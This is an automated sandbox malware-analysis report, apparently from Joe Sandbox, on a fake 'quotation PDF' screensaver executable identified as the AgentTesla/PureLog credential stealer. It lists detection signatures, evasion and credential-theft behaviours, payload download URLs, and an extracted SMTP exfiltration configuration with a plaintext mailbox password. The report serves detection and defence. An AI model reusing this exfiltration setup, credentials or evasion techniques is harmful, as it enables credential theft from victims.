Windows Analysis Report
QUOTATION_JULQTRA071244#U00faPDF.scr.exe

Overview

General Information

Sample name:QUOTATION_JULQTRA071244#U00faPDF.scr.exe
renamed because original name is a hash value
Original sample name:QUOTATION_JULQTRA071244PDF.scr.exe
Analysis ID:1467095
MD5:f0a33bc19a7edfa50259138ceae8c2ef
SHA1:23502ba3d4862040181f3484c7a07fd514b7e4d0
SHA256:49c758a7ea0cb8c7320183804f885757f60c5979be2e5fb9e6fa9db40498939b
Tags:exescr

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • QUOTATION_JULQTRA071244#U00faPDF.scr.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe" MD5: F0A33BC19A7EDFA50259138CEAE8C2EF)
    • aspnet_compiler.exe (PID: 5584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "minors@aoqiinflatables.com", "Password": "RaF5@@ts7^^!@San@<!!"}
Source | Rule | Description | Author | Strings
00000000.00000002.1940288788.00000000080E0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dace20.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dd4e40.10.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (listed below)
  • 0x31fe7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x32059:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x320e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32175:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x321df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x32251:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x322e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32377:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe, ParentProcessId: 7612, ParentProcessName: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5584, ProcessName: aspnet_compiler.exe
No Snort rule has matched

AV Detection

Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Avira: detected
Source: 6.2.aspnet_compiler.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "minors@aoqiinflatables.com", "Password": "RaF5@@ts7^^!@San@<!!"}
Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe | ReversingLabs: Detection: 52%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Joe Sandbox ML: detected
Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp

Networking

Source: Yara match | File source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /data-package/btd2ptah/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /storage/download/FiMxpnoPTxVw HTTP/1.1 Host: s21.filetransfer.io Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /data-package/btd2ptah/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: filetransfer.io
Source: global traffic | DNS traffic detected: DNS query: s21.filetransfer.io
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706

System Summary

Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: initial sample | Static PE information: Filename: QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_JULQTRA071244#U00faPDF.scr.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: NULL
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002EAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeReversingLabs: Detection: 52%
                    Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe"
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
